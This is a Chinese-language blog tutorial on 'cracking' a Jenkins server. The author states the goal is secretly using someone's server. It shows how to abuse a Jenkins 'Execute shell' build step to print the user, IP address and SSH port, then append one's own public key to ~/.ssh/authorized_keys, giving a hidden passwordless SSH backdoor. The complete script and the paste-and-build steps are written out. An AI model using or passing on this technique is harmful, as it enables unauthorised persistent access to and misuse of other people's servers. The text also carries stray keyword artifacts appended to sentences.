兩步完成Jenkins服務器破解

前言


爲何忽然想到了破解Jenkins服務器呢,無非是本身想遠程登陸上去,操做一些不可告人的祕密(其實也就是利用這臺服務器可用資源)至於如何破解的呢!簡單到爆,接下來讓老夫娓娓道來shell

關於Jenkins


說道Jenkins,這個工具應該你們早有耳聞,一個持續集成的工具,咱們能夠在上面集成各類雜七雜八的項目。至於介紹也就很少說了。ubuntu

條件

  • 登陸Jenkins帳戶帳號密碼

  • 瞭解簡單的Shell命令

以上兩點有了,就能夠開始咱們的破解大業了,接下來就是如何或者說從哪裏入手破解這臺服務器,而後經過咱們的電腦登陸到Jenkins服務器了。vim

Action One

  1. 掌握上述的條件,經過瀏覽器登陸Jenkins,隨意建立配置一個Jenkins項目,也能夠基於現有的項目進行操做,首先隨便點進一個項目以下圖所示

  1. 這裏演示的是一個配置好的項目,能夠正常編譯成功,咱們這時候只須要點擊左方的配置選項按鈕到達下圖

  1. 能夠看到這裏須要咱們爲這個項目配置一系列的操做,包括這個項目所須要的環境。其實全部的配置最終爲了將編譯的結果告知於衆,上圖的倒數第二個Tab,構建的操做,在這裏咱們能夠增長構建步驟,咱們能夠點擊這個Tab看看有哪些咱們能夠操做的,點開以後會發現有不少的功能,如圖所示

  1. 其實最關鍵的仍是執行Shell,這個就是咱們破解服務器的突破口,點擊這個選項,能夠看到以下窗口圖

  1. 其實接下來就很簡單了,既然咱們能拿到在服務器裏面執行Shell腳本的入口,想搞什麼不行啊。打開命令行一梭子代碼就搞定。

若是完成了以上5步,那咱們離成功只剩下一步之遙了。瀏覽器

Action Two

登陸遠程服務器無非是經過SSH,可是咱們也不知道這個服務器的用戶名,IP,端口號怎麼辦。其實咱們在第一步的時候已經拿到了Shell窗口,IP和用戶名簡單的兩行代碼就能夠搞定bash

whoami

ifconfig

/sbin/ifconfig eth0 | grep 'inet addr' | cut -d: -f2 | awk '{print $1}' #直接過濾出ip地址 ubuntu
ifconfig | grep "inet " | grep -v 127.0.0.1 | cut -d\  -f2 #直接過濾出ip地址 mac
複製代碼

都是很是簡單的命令,就能夠拿到服務器的用戶名及IP地址了,那麼如何拿到遠程SSH登陸端口號呢?服務器

vim /etc/ssh/sshd_config
複製代碼

這個就是SSH的啓動配置文件,能夠在裏面搜索Port就能夠找到遠程開放的端口號,以下圖所示ssh

想圖省事也能夠這樣更簡單,把port拿到工具

cat /etc/ssh/sshd_config |grep -i port
複製代碼

那麼咱們都知道了如何拿到這些信息了,那麼接下來如何登陸呢,這就用到了Action One的第五步裏面的Shell窗口。ui

只須要把下面的語句添加到Shell窗口裏面就好,等Jenkins編譯好了,下面的服務器的信息你也就能夠從控制檯輸出日誌裏面拿到了spa

ROOT_NAME_CMD=$(whoami)
IP_CMD=$(/sbin/ifconfig eth0 | grep 'inet addr' | cut -d: -f2 | awk '{print $1}')
PORT_CMD=$(cat /etc/ssh/sshd_config |grep -i port)
echo $ROOT_NAME_CMD
echo ==========================
echo $IP_CMD
echo ==========================
echo $PORT_CMD
複製代碼

若是說IP地址爲空的話,換一種方式grep ,不一樣的系統平臺,腳本可能不一致,不閒麻煩直接把所有的ifconfig打印出來。

如今已經知道了服務器的IP用戶名及端口號,那麼接下來咱們是否是直接能夠SSH登陸了呢。Say No!咱們到如今爲止只是拿到了帳號而已,還差密碼呢。確定是登陸不了的,那麼密碼咱們如何拿到呢。拿到密碼但是不容易的,可是咱們這一條路走的比較困難,那咱們換一條路,簡單粗暴型,免密登陸,那麼如何才能免密登陸呢!SSH免密登陸你們平常應該有用到過,否則每次輸入密碼太噁心了,SSH免密登陸所須要的條件就是pubic key,只要咱們把本身的public key 給了服務器,這時候咱們就有了服務器的受權,那就能夠執行免密登陸

pubkey通常都在這裏 ~/.ssh/id_ras.pub,沒有的本身建立一下 terminal 下 cd 到這個目錄 ~/.ssh/ 輸入 ssh keygen 不停的回車就好了。

拿到了咱們本機的pubKey 如何給讓服務器給咱們受權呢,簡單的一步就搞定,把咱們的ssh pub key 內容追加到服務器~./ssh/目錄下的authorized_keys文件夾中便可

echo "pubkey內容" >> ~/.ssh/authorized_keys
複製代碼

至此咱們破解服務器的腳本已經完成了

ROOT_NAME_CMD=$(whoami)
IP_CMD=$(/sbin/ifconfig eth0 | grep 'inet addr' | cut -d: -f2 | awk '{print $1}')
PORT_CMD=$(cat /etc/ssh/sshd_config |grep -i port)
echo $ROOT_NAME_CMD
echo ==========================
echo $IP_CMD
echo ==========================
echo $PORT_CMD

echo "pubkey內容" >> ~/.ssh/authorized_keys
複製代碼

把這些代碼複製到shell Action one 第五步的窗口中便可,別忘了保存

這時候回到Jenkins項目主頁,點擊構建,而後查看編譯日誌,全部的信息都會打印出來,而後這時候打開咱們的terminal 悄悄的輸入 ssh username@IP -p port 唰的一下,咱們就登陸了Jenkins服務器了。

Ending

至此Jenkins服務器就被咱們破解了,其實目標明確了,手段嗎,就看你們的了,簡單粗暴便可,這也就是一種投機取巧的方式。你們能夠玩玩,娛樂一下。

相關文章
相關標籤/搜索